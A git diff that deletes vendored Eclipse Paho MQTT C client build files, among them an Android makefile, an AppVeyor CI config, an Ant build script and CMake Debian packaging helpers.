-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/about.html b/thirdparty/paho.mqtt.c/about.html
deleted file mode 100644
index 6555a44..0000000
--- a/thirdparty/paho.mqtt.c/about.html
+++ /dev/null
@@ -1,28 +0,0 @@
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml"><head>
-<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
-<title>About</title>
-</head>
-<body lang="EN-US">
-<h2>About This Content</h2>
- 
-<p><em>December 9, 2013</em></p>	
-<h3>License</h3>
-
-<p>The Eclipse Foundation makes available all content in this plug-in ("Content").  Unless otherwise 
-indicated below, the Content is provided to you under the terms and conditions of the
-Eclipse Public License Version 1.0 ("EPL") and Eclipse Distribution License Version 1.0 ("EDL").
-A copy of the EPL is available at 
-<a href="http://www.eclipse.org/legal/epl-v10.html">http://www.eclipse.org/legal/epl-v10.html</a> 
-and a copy of the EDL is available at 
-<a href="http://www.eclipse.org/org/documents/edl-v10.php">http://www.eclipse.org/org/documents/edl-v10.php</a>. 
-For purposes of the EPL, "Program" will mean the Content.</p>
-
-<p>If you did not receive this Content directly from the Eclipse Foundation, the Content is 
-being redistributed by another party ("Redistributor") and different terms and conditions may
-apply to your use of any object code in the Content.  Check the Redistributor's license that was 
-provided with the Content.  If no such license exists, contact the Redistributor.  Unless otherwise
-indicated below, the terms and conditions of the EPL still apply to any source code in the Content
-and such source code may be obtained at <a href="http://www.eclipse.org/">http://www.eclipse.org</a>.</p>
-
-</body></html>
diff --git a/thirdparty/paho.mqtt.c/android/Android.mk b/thirdparty/paho.mqtt.c/android/Android.mk
deleted file mode 100644
index 6338da5..0000000
--- a/thirdparty/paho.mqtt.c/android/Android.mk
+++ /dev/null
@@ -1,140 +0,0 @@
-# Example: Android Native Library makefile for paho.mqtt.c
-# contributed by Bin Li <bin.li@windriver.com>
-
-LOCAL_PATH := $(call my-dir)
-libpaho-mqtt3_lib_path := ../src
-libpaho-mqtt3_c_includes := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path) \
-	external/hdc/android-ifaddrs \
-	external/openssl/include \
-	external/zlib
-
-# build sample util
-define build_sample_util
-__sample_module:= $1
-__sample_lib:= $2
-include $(CLEAR_VARS)
-LOCAL_C_INCLUDES := $(libpaho-mqtt3_c_includes)
-LOCAL_SHARED_LIBRARIES := $$(__sample_lib)
-LOCAL_MODULE := $$(__sample_module)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_lib_path)/samples/$$(__sample_module).c
-include $(BUILD_EXECUTABLE)
-endef
-
-libpaho-mqtt3_local_src_c_files_common := \
-	$(libpaho-mqtt3_lib_path)/MQTTProtocolClient.c \
-	$(libpaho-mqtt3_lib_path)/Tree.c \
-	$(libpaho-mqtt3_lib_path)/Heap.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPacket.c \
-	$(libpaho-mqtt3_lib_path)/Clients.c \
-	$(libpaho-mqtt3_lib_path)/Thread.c \
-	$(libpaho-mqtt3_lib_path)/utf-8.c \
-	$(libpaho-mqtt3_lib_path)/StackTrace.c \
-	$(libpaho-mqtt3_lib_path)/MQTTProtocolOut.c \
-	$(libpaho-mqtt3_lib_path)/Socket.c \
-	$(libpaho-mqtt3_lib_path)/Log.c \
-	$(libpaho-mqtt3_lib_path)/Messages.c \
-	$(libpaho-mqtt3_lib_path)/LinkedList.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPersistence.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPacketOut.c \
-	$(libpaho-mqtt3_lib_path)/SocketBuffer.c \
-	$(libpaho-mqtt3_lib_path)/MQTTPersistenceDefault.c \
-
-libpaho-mqtt3_local_src_c_files_c := \
-	$(libpaho-mqtt3_lib_path)/MQTTClient.c \
-
-libpaho-mqtt3_local_src_c_files_cs := \
-	$(libpaho-mqtt3_lib_path)/MQTTClient.c \
-	$(libpaho-mqtt3_lib_path)/SSLSocket.c \
-
-libpaho-mqtt3_local_src_c_files_a := \
-	$(libpaho-mqtt3_lib_path)/MQTTAsync.c \
-
-libpaho-mqtt3_local_src_c_files_as := \
-	$(libpaho-mqtt3_lib_path)/MQTTAsync.c \
-	$(libpaho-mqtt3_lib_path)/SSLSocket.c \
-
-# update the header file which normally generated by cmake
-$(shell (cp -f $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h.in $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h))
-$(shell (sed -i "s/@CLIENT_VERSION@/1.2.0/g" $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h))
-$(shell ( sed -i "s/@BUILD_TIMESTAMP@/$(shell date)/g" $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)/VersionInfo.h))
-
-# building static libraries
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3c
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_c)
-include $(BUILD_STATIC_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3cs
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_cs)
-include $(BUILD_STATIC_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3a
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_a)
-include $(BUILD_STATIC_LIBRARY)
-  
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3as
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_as)
-include $(BUILD_STATIC_LIBRARY)
-
-# building shared libraries
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3c
-LOCAL_SHARED_LIBRARIES := libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_c)
-include $(BUILD_SHARED_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3cs
-LOCAL_SHARED_LIBRARIES := libcrypto libssl libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/$(libpaho-mqtt3_lib_path)
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_cs)
-include $(BUILD_SHARED_LIBRARY)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3a
-LOCAL_SHARED_LIBRARIES := libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_a)
-include $(BUILD_SHARED_LIBRARY)
- 
-include $(CLEAR_VARS)
-LOCAL_MODULE    := libpaho-mqtt3as
-LOCAL_SHARED_LIBRARIES := libcrypto libssl libdl
-LOCAL_EXPORT_C_INCLUDE_DIRS := $(LOCAL_PATH)/${libpaho-mqtt3_lib_path}
-LOCAL_CFLAGS += -DOPENSSL
-LOCAL_C_INCLUDES:= $(libpaho-mqtt3_c_includes)
-LOCAL_SRC_FILES := $(libpaho-mqtt3_local_src_c_files_common) $(libpaho-mqtt3_local_src_c_files_as)
-include $(BUILD_SHARED_LIBRARY)
-
-# building samples
-
-$(eval $(call build_sample_util, MQTTAsync_subscribe, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, MQTTAsync_publish, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, MQTTClient_publish, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, MQTTClient_publish_async, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, MQTTClient_subscribe, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, paho_c_pub, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, paho_c_sub, libpaho-mqtt3a ) )
-$(eval $(call build_sample_util, paho_cs_pub, libpaho-mqtt3c ) )
-$(eval $(call build_sample_util, paho_cs_sub, libpaho-mqtt3c ) )
-
diff --git a/thirdparty/paho.mqtt.c/appveyor.yml b/thirdparty/paho.mqtt.c/appveyor.yml
deleted file mode 100644
index ce250bd..0000000
--- a/thirdparty/paho.mqtt.c/appveyor.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-version: 1.2.{build}

-image:

-  - Visual Studio 2013

-  - Visual Studio 2015

-configuration: Debug
-install:
-  - cmd: openssl version
-
-  - cmd: python --version
-

-  - cmd: netsh advfirewall firewall add rule name="Python 2.7" dir=in action=allow program="C:\Python27\python.exe" enable=yes

-

-  - cmd: netsh advfirewall firewall add rule name="Open Port 1883" dir=in action=allow protocol=TCP localport=1883

-

-  - cmd: netsh advfirewall set allprofiles state off
-
-  - ps: Start-Process python -ArgumentList 'test\mqttsas2.py'
-
-  - cmd: C:\Python36\python --version
-
-  - cmd: git clone https://github.com/eclipse/paho.mqtt.testing.git
-
-  - cmd: cd paho.mqtt.testing\interoperability
-
-  - ps: Start-Process C:\Python36\python -ArgumentList 'startbroker.py'
-
-  - cmd: cd ..\..
-

-build_script:

-- cmd: >-

-    mkdir build.paho

-

-    cd build.paho

-

-    echo %APPVEYOR_BUILD_WORKER_IMAGE%

-

-    if "%APPVEYOR_BUILD_WORKER_IMAGE%" == "Visual Studio 2015" call "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" x64

-

-    if "%APPVEYOR_BUILD_WORKER_IMAGE%" == "Visual Studio 2013" call "C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\vcvarsall.bat" x64

-

-    cmake -G "NMake Makefiles" -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=FALSE -DPAHO_BUILD_SAMPLES=TRUE -DCMAKE_BUILD_TYPE=Release -DCMAKE_VERBOSE_MAKEFILE=TRUE ..

-

-    nmake
-

-    ctest -T test -VV

-

-    cd ..

-

-test:

-  assemblies: build/Testing/*/Test.xml

diff --git a/thirdparty/paho.mqtt.c/build.xml b/thirdparty/paho.mqtt.c/build.xml
deleted file mode 100644
index 07a9ec3..0000000
--- a/thirdparty/paho.mqtt.c/build.xml
+++ /dev/null
@@ -1,316 +0,0 @@
-<!--****************************************************************************
-  Copyright (c) 2012, 2017 IBM Corp.
-
-  All rights reserved. This program and the accompanying materials
-  are made available under the terms of the Eclipse Public License v1.0
-  and Eclipse Distribution License v1.0 which accompany this distribution.
-
-  The Eclipse Public License is available at
-     http://www.eclipse.org/legal/epl-v10.html
-  and the Eclipse Distribution License is available at
-    http://www.eclipse.org/org/documents/edl-v10.php.
-
-  Contributors:
-     Ian Craggs - initial API and implementation and/or initial documentation
-*******************************************************************************-->
-
-<project name="MQTT C Client" default="full">
-
-  <taskdef resource="net/sf/antcontrib/antlib.xml">
-    <classpath>
-      <pathelement location="/opt/public/cbi/build/3rdPartyJars/ant-contrib.jar" />
-      <pathelement location="/usr/share/java/ant-contrib.jar" />
-    </classpath>
-  </taskdef>
-
-  <property name="output.folder" value="build/output" />
-  <property name="release.version" value="1.2.0" />
-
-  <property name="libname" value="mqttv3c" />
-  <property name="libname.ssl" value="mqttv3cs" />
-  <property name="libname.async" value="mqttv3a" />
-  <property name="libname.async.ssl" value="mqttv3as" />
-  <property name="ssl" value="yes" />
-  <property name="windows.openssl.folder" value="c:\openssl\bin" />
-  <property name="test.hostname" value="iot.eclipse.org"/>
-  <property name="test.port" value="1883"/>
-  <property name="proxy.port" value="18883"/>
-  <if>
-    <os family="windows"/>
-    <then>
-      <property name="os.family" value="windows" />
-    </then>
-    <else>
-      <if>
-      <os family="mac"/>
-      <then>
-        <property name="os.family" value="mac" />
-      </then>
-      <else>
-        <property name="os.family" value="unix" />
-      </else>
-      </if>
-    </else>
-  </if>
-  <echo message="os.family is '${os.family}'" />
-
-  <target name="init">
-    <tstamp>
-      <format property="buildTimestamp" pattern="yyyyMMddHHmm" />
-    </tstamp>
-
-    <fileset id="sync.source.fileset" dir="src">
-      <include name="*.c"/>
-      <exclude name="MQTTAsync.c"/>
-      <exclude name="MQTTVersion.c"/>
-    </fileset>
-    <pathconvert refid="sync.source.fileset" property="sync.source.files" pathsep=" "/>
-
-    <fileset id="async.source.fileset" dir="src">
-      <include name="*.c"/>
-      <exclude name="MQTTClient.c"/>
-      <exclude name="MQTTVersion.c"/>
-    </fileset>
-    <pathconvert refid="async.source.fileset" property="async.source.files" pathsep=" "/>
-
-  </target>
-
-  <target name="version" depends="init" description="replace tags with the right levels">
-    <property name="build.level" value="${DSTAMP}${TSTAMP}" />
-    <copy file="src/VersionInfo.h.in" tofile="src/VersionInfo.h" overwrite="true"/>
-    <replace file="src/VersionInfo.h" token="@BUILD_TIMESTAMP@" value="${build.level}" />
-    <replace file="src/VersionInfo.h" token="@CLIENT_VERSION@" value="${release.version}" />
-  </target>
-
-  <target name="test" >
-    <!-- display Python version -->
-    <exec executable="python" failonerror="true">
-      <arg line="-V"/>
-    </exec>
-    <exec executable="python" dir="test" spawn="true">
-        <arg value="mqttsas2.py" />
-        <arg value="${test.hostname}" />
-        <arg value="${test.port}" />
-        <arg value="${proxy.port}" />
-    </exec>
-    <if>
-      <os family="windows"/>
-    <then>
-      <foreach target="runAtest" param="aTest" list="test1,test2,test4,test9"/>
-    </then>
-    <else>
-      <foreach target="runAtest" param="aTest" list="test1,test2,test4,test9"/>
-    </else>
-    </if>
-    <foreach target="runSSLtest" param="aTest" list="test3,test5"/>
-  </target>
-
-  <target name="runAtest">
-    <if>
-      <os family="windows"/>
-    <then>
-      <exec executable="cmd.exe" failonerror="true" dir="${output.folder}/test" >
-        <arg value="/c" />
-        <arg value="${aTest}.exe" />
-        <arg value="--connection" />
-        <arg value="tcp://${test.hostname}:${test.port}" />
-        <arg value="--proxy_connection" />
-        <arg value="tcp://localhost:${proxy.port}" />
-        <env key="PATH" path="${output.folder}" />
-      </exec>
-    </then>
-    <else>
-      <exec executable="./${aTest}" failonerror="true" dir="${output.folder}/test" >
-        <arg value="--connection" />
-        <arg value="tcp://${test.hostname}:${test.port}" />
-        <arg value="--proxy_connection" />
-        <arg value="tcp://localhost:${proxy.port}" />
-        <env key="LD_LIBRARY_PATH" path="${output.folder}" />
-        <env key="DYLD_LIBRARY_PATH" path="${output.folder}" />
-      </exec>
-    </else>
-    </if>
-  </target>
-
-  <target name="runSSLtest">
-    <if>
-      <os family="windows"/>
-    <then>
-      <exec executable="cmd.exe" failonerror="true" dir="${output.folder}/test" >
-        <arg value="/c" />
-        <arg value="${aTest}.exe" />
-        <arg value="--hostname" />
-        <arg value="${test.hostname}" />
-        <env key="PATH" path="${output.folder};${windows.openssl.folder}" />
-      </exec>
-    </then>
-    <else>
-      <exec executable="./${aTest}" failonerror="true" dir="${output.folder}/test" >
-        <arg value="--hostname" />
-        <arg value="${test.hostname}" />
-        <env key="LD_LIBRARY_PATH" path="${output.folder}" />
-        <env key="DYLD_LIBRARY_PATH" path="${output.folder}" />
-      </exec>
-    </else>
-    </if>
-  </target>
-
-  <target name="doc" >
-    <if>
-      <available file="/usr/bin/doxygen"/>
-      <then>
-        <mkdir dir="${output.folder}/doc"/>
-        <exec executable="doxygen" dir="src">
-          <arg value="../doc/DoxyfileV3ClientAPI"/>
-        </exec>
-        <exec executable="doxygen" dir="src">
-          <arg value="../doc/DoxyfileV3AsyncAPI"/>
-        </exec>
-        <zip destfile="${output.folder}/MQTTClient_doc.zip">
-          <zipfileset dir="${output.folder}/doc/MQTTClient" />
-        </zip>
-        <zip destfile="${output.folder}/MQTTAsync_doc.zip">
-	        <zipfileset dir="${output.folder}/doc/MQTTAsync" prefix="MQTTAsync/"/>
-        </zip>
-        <delete dir="${output.folder}/doc" />
-      </then>
-      <else>
-        <echo message="doxygen is not available" />
-      </else>
-    </if>
-  </target>
-
-  <target name="build" >
-    <if>
-    <os family="unix"/>
-    <then>
-    <delete dir="${output.folder}" />
-    <!-- display gcc version -->
-    <exec executable="gcc" failonerror="true">
-      <arg line="-v"/>
-    </exec>
-    <if>
-      <available file="/usr/bin/make"/>
-      <then>
-        <exec executable="make" dir="."/>
-      </then>
-    </if>
-    </then>
-    </if>
-    <if>
-    <os family="windows"/>
-    <then>
-    <delete dir="${output.folder}" />
-    <!-- display gcc version -->
-    <exec executable="cl" failonerror="true">
-    </exec>
-    <exec executable="msbuild" dir=".">
-           <arg line='"Windows Build\Paho C MQTT APIs.sln"'/>
-           <arg line="/p:Configuration=Release"/>
-    </exec>
-     </then>
-    </if>
-  </target>
-
-  <target name="package">
-    <mkdir dir="${output.folder}/include"/>
-    <copy overwrite="true" todir="${output.folder}/include">
-      <fileset dir="src" includes="MQTTClient.h,MQTTAsync.h,MQTTClientPersistence.h"/>
-    </copy>
-    <copy overwrite="true" todir="${output.folder}">
-      <fileset dir="." includes="README.md,CONTRIBUTING.md,about.html,notice.html,edl-v10,epl-v10"/>
-    </copy>
-    <mkdir dir="${output.folder}/lib"/>
-    <move overwrite="true" todir="${output.folder}/lib">
-      <fileset dir="${output.folder}" includes="*paho*"/>
-    </move>
-    <mkdir dir="${output.folder}/bin"/>
-    <move overwrite="true" todir="${output.folder}/bin">
-      <fileset dir="${output.folder}/samples" includes="*"/>
-      <fileset dir="${output.folder}" includes="MQTTVersion"/>
-    </move>
-    <copy overwrite="true" todir="${output.folder}/samples">
-      <fileset dir="src/samples" includes="*"/>
-    </copy>
-    <delete>
-       <fileset dir="." includes="eclipse-paho-mqtt-c-windows-${release.version}.zip"/>
-       <fileset dir="." includes="eclipse-paho-mqtt-c-${os.family}-${release.version}.tar.gz"/>
-    </delete>
-
-   <if>
-    <os family="windows"/>
-    <then>
-    <exec executable="c:\cygwin\bin\zip.exe" failonerror="true" dir="${output.folder}">
-      <arg value="-r"/>
-      <arg value="eclipse-paho-mqtt-c-windows-${release.version}.zip"/>
-      <arg value="about.html"/>
-      <arg value="notice.html"/>
-      <arg value="README.md"/>
-      <arg value="CONTRIBUTING.md"/>
-      <arg value="epl-v10"/>
-      <arg value="edl-v10"/>
-      <arg value="include"/>
-	  <arg value="samples"/>
-      <arg value="lib"/>
-      <arg value="bin"/>
-    </exec>
-    </then>
-    <else>
-    <exec executable="tar" failonerror="true" dir="${output.folder}">
-      <arg value="czf"/>
-      <arg value="eclipse-paho-mqtt-c-${os.family}-${release.version}.tar.gz"/>
-      <arg value="about.html"/>
-      <arg value="notice.html"/>
-      <arg value="README.md"/>
-      <arg value="CONTRIBUTING.md"/>
-      <arg value="epl-v10"/>
-      <arg value="edl-v10"/>
-      <arg value="include"/>
-	  <arg value="samples"/>
-      <arg value="lib"/>
-      <arg value="bin"/>
-    </exec>
-    </else>
-    </if>
-
-   <if>
-    <os family="unix"/>
-    <then>
-    <exec executable="tar" failonerror="true" dir=".">
-      <arg value="czf"/>
-      <arg value="${output.folder}/eclipse-paho-mqtt-c-src-${release.version}.tar.gz"/>
-      <arg value="about.html"/>
-      <arg value="notice.html"/>
-      <arg value="README.md"/>
-      <arg value="CONTRIBUTING.md"/>
-      <arg value="epl-v10"/>
-      <arg value="edl-v10"/>
-      <arg value="Makefile"/>
-      <arg value="build.xml"/>
-      <arg value="src"/>
-      <arg value="test"/>
-      <arg value="Windows Build"/>
-    </exec>
-    </then>
-   </if>
-  </target>
-
-  <target name="copy">
-    <if>
-      <available file="/shared/technology"/>
-      <then>
-        <mkdir dir="/shared/technology/paho/C/${release.version}/${build.level}"/>
-       	<echo message="Copying the build output to /shared" />
-      	<copy overwrite="true" todir="/shared/technology/paho/C/${release.version}/${build.level}">
-          <fileset dir="${output.folder}">
-	          <include name="*.gz"/>
-	          <include name="*.zip"/>
-          </fileset>
-        </copy>
-      </then>
-    </if>
-  </target>
-
-  <target name="full" depends="init, version, build, test, doc, package, copy" />
-
-</project>
diff --git a/thirdparty/paho.mqtt.c/cbuild.bat b/thirdparty/paho.mqtt.c/cbuild.bat
deleted file mode 100644
index 22cbd37..0000000
--- a/thirdparty/paho.mqtt.c/cbuild.bat
+++ /dev/null
@@ -1,19 +0,0 @@
-
-setlocal
-
-rmdir /s /q build.paho
-mkdir build.paho
-
-cd build.paho
-
-call "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" x64
-
-cmake -G "NMake Makefiles" -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=FALSE -DPAHO_BUILD_SAMPLES=TRUE -DCMAKE_BUILD_TYPE=Release -DCMAKE_VERBOSE_MAKEFILE=TRUE ..
-
-nmake
-
-ctest -T test -VV
-
-cd ..
-
-endlocal
diff --git a/thirdparty/paho.mqtt.c/cmake/CPackDebConfig.cmake.in b/thirdparty/paho.mqtt.c/cmake/CPackDebConfig.cmake.in
deleted file mode 100644
index c815426..0000000
--- a/thirdparty/paho.mqtt.c/cmake/CPackDebConfig.cmake.in
+++ /dev/null
@@ -1,91 +0,0 @@
-IF (CPACK_GENERATOR MATCHES "DEB")
-    FIND_PROGRAM(DPKG_PROGRAM dpkg DOC "dpkg program of Debian-based systems")
-    IF (DPKG_PROGRAM)
-      EXECUTE_PROCESS(
-        COMMAND ${DPKG_PROGRAM} --print-architecture
-        OUTPUT_VARIABLE CPACK_DEBIAN_PACKAGE_ARCHITECTURE
-        OUTPUT_STRIP_TRAILING_WHITESPACE
-      )
-    ELSE (DPKG_PROGRAM)
-      MESSAGE(FATAL_ERROR "Could not find an architecture for the package")
-    ENDIF (DPKG_PROGRAM)
-
-    EXECUTE_PROCESS(
-      COMMAND lsb_release -si
-      OUTPUT_VARIABLE CPACK_DEBIAN_DIST_NAME
-      RESULT_VARIABLE DIST_NAME_STATUS
-      OUTPUT_STRIP_TRAILING_WHITESPACE
-    )
-
-    IF (DIST_NAME_STATUS)
-       MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution name")
-    ENDIF (DIST_NAME_STATUS)
-
-    IF (CPACK_DEBIAN_DIST_NAME STREQUAL "")
-      MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution name")
-    ENDIF ()
-
-    EXECUTE_PROCESS(
-      COMMAND lsb_release -sc
-      OUTPUT_VARIABLE CPACK_DEBIAN_DIST_CODE
-      RESULT_VARIABLE DIST_CODE_STATUS
-      OUTPUT_STRIP_TRAILING_WHITESPACE
-    )
-
-    IF (DIST_NAME_STATUS)
-       MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution codename")
-    ENDIF (DIST_NAME_STATUS)
-
-    IF (CPACK_DEBIAN_DIST_CODE STREQUAL "")
-      MESSAGE(FATAL_ERROR "Could not find a GNU/Linux distribution codename")
-    ENDIF ()
-
-    SET(CPACK_PACKAGE_VERSION_MAJOR @PAHO_VERSION_MAJOR@)
-    SET(CPACK_PACKAGE_VERSION_MINOR @PAHO_VERSION_MINOR@)
-    SET(CPACK_PACKAGE_VERSION_PATCH @PAHO_VERSION_PATCH@)
-    SET(PACKAGE_VERSION
-        "${CPACK_PACKAGE_VERSION_MAJOR}.${CPACK_PACKAGE_VERSION_MINOR}.${CPACK_PACKAGE_VERSION_PATCH}")
-
-    IF (PACKAGE_VERSION STREQUAL "")
-      MESSAGE(FATAL_ERROR "Could not find a version number for the package")
-    ENDIF ()
-
-    SET(PAHO_WITH_SSL @PAHO_WITH_SSL@)
-
-    MESSAGE("Package version:   ${PACKAGE_VERSION}")
-    MESSAGE("Package built for: ${CPACK_DEBIAN_DIST_NAME} ${CPACK_DEBIAN_DIST_CODE}")
-    IF(PAHO_WITH_SSL)
-        MESSAGE("Package built with ssl-enabled binaries too")
-    ENDIF()
-
-    # Additional lines to a paragraph should start with " "; paragraphs should
-    # be separated with a " ." line
-    SET(CPACK_PACKAGE_NAME "libpaho-mqtt")
-    SET(CPACK_PACKAGE_CONTACT "Eclipse")
-    SET(CPACK_PACKAGE_DESCRIPTION_SUMMARY "Eclipse Paho MQTT C client")
-    SET(CPACK_DEBIAN_PACKAGE_NAME ${CPACK_PACKAGE_NAME})
-    SET(CPACK_DEBIAN_PACKAGE_MAINTAINER
-        "Genis Riera Perez <genis.riera.perez@gmail.com>")
-    SET(CPACK_DEBIAN_PACKAGE_DESCRIPTION "Eclipse Paho MQTT C client library")
-    SET(CPACK_DEBIAN_PACKAGE_SHLIBDEPS ON)
-    SET(CPACK_DEBIAN_PACKAGE_VERSION ${PACKAGE_VERSION})
-    SET(CPACK_DEBIAN_PACKAGE_SECTION "net")
-    SET(CPACK_DEBIAN_PACKAGE_CONFLICTS ${CPACK_PACKAGE_NAME})
-    SET(CPACK_PACKAGE_FILE_NAME
-        "${CPACK_DEBIAN_PACKAGE_NAME}_${CPACK_DEBIAN_PACKAGE_VERSION}_${CPACK_DEBIAN_PACKAGE_ARCHITECTURE}")
-    IF(PAHO_WITH_SSL)
-      SET(CPACK_DEBIAN_PACKAGE_DEPENDS "libssl-dev")
-    ENDIF()
-
-    UNSET(PACKAGE_VERSION CACHE)
-    UNSET(CPACK_DEBIAN_PACKAGE_VERSION CACHE)
-
-    #
-    # From CMakeDebHelper
-    # See http://www.cmake.org/Wiki/CMake:CPackPackageGenerators#Overall_usage_.28common_to_all_generators.29
-    #
-
-    # When the DEB-generator runs, we want him to run our install-script
-    #set( CPACK_INSTALL_SCRIPT ${CPACK_DEBIAN_INSTALL_SCRIPT} )
-
-ENDIF()
diff --git a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelper.cmake b/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelper.cmake
deleted file mode 100644
index 3dd9572..0000000
--- a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelper.cmake
+++ /dev/null
@@ -1,74 +0,0 @@
-#=============================================================================
-# CMakeDebHelper, Copyright (C) 2013 Sebastian Kienzl
-# http://knzl.de/cmake-debhelper/
-# Licensed under the GPL v2, see LICENSE
-#=============================================================================
-
-# configure() .in-files to the CURRENT_BINARY_DIR
-foreach( _F ${DH_INPUT} )
-    # strip the .in part
-    string( REGEX REPLACE ".in$" "" _F_WE ${_F} )
-    configure_file( ${_F} ${_F_WE} @ONLY )
-endforeach()
-
-# compat and control is only needed for running the debhelpers,
-# CMake is going to make up the one that ends up in the deb.
-file( WRITE ${CMAKE_CURRENT_BINARY_DIR}/compat "9" )
-if( NOT CPACK_DEBIAN_PACKAGE_NAME )
-    string( TOLOWER "${CPACK_PACKAGE_NAME}" CPACK_DEBIAN_PACKAGE_NAME )
-endif()
-file( WRITE ${CMAKE_CURRENT_BINARY_DIR}/control "Package: ${CPACK_DEBIAN_PACKAGE_NAME}\nArchitecture: any\n" )
-
-# Some debhelpers need fakeroot, we use it for all of them
-find_program( FAKEROOT fakeroot )
-if( NOT FAKEROOT )
-    message( SEND_ERROR "fakeroot not found, please install" )
-endif()
-
-find_program( DEBHELPER dh_prep )
-if( NOT DEBHELPER )
-    message( SEND_ERROR "debhelper not found, please install" )
-endif()
-
-# Compose a string with a semicolon-seperated list of debhelpers
-foreach( _DH ${DH_RUN} )
-    set( _DH_RUN_SC_LIST "${_DH_RUN_SC_LIST} ${_DH} ;" )
-endforeach()
-
-# Making sure the debhelpers run each time we change one of ${DH_INPUT}
-add_custom_command(
-    OUTPUT dhtimestamp
-
-    # dh_prep is needed to clean up, dh_* aren't idempotent
-    COMMAND ${FAKEROOT} dh_prep
-    
-    # I haven't found another way to run a list of commands here
-    COMMAND ${FAKEROOT} -- sh -c "${_DH_RUN_SC_LIST}"
-    
-    # needed to create the files we'll use  
-    COMMAND ${FAKEROOT} dh_installdeb
-
-    COMMAND touch ${CMAKE_CURRENT_BINARY_DIR}/dhtimestamp
-    WORKING_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/..
-    DEPENDS ${DH_INPUT}
-    COMMENT "Running debhelpers"
-    VERBATIM
-)
-
-add_custom_target( dhtarget ALL
-    DEPENDS dhtimestamp
-)
-
-# these files are generated by debhelpers from our templates
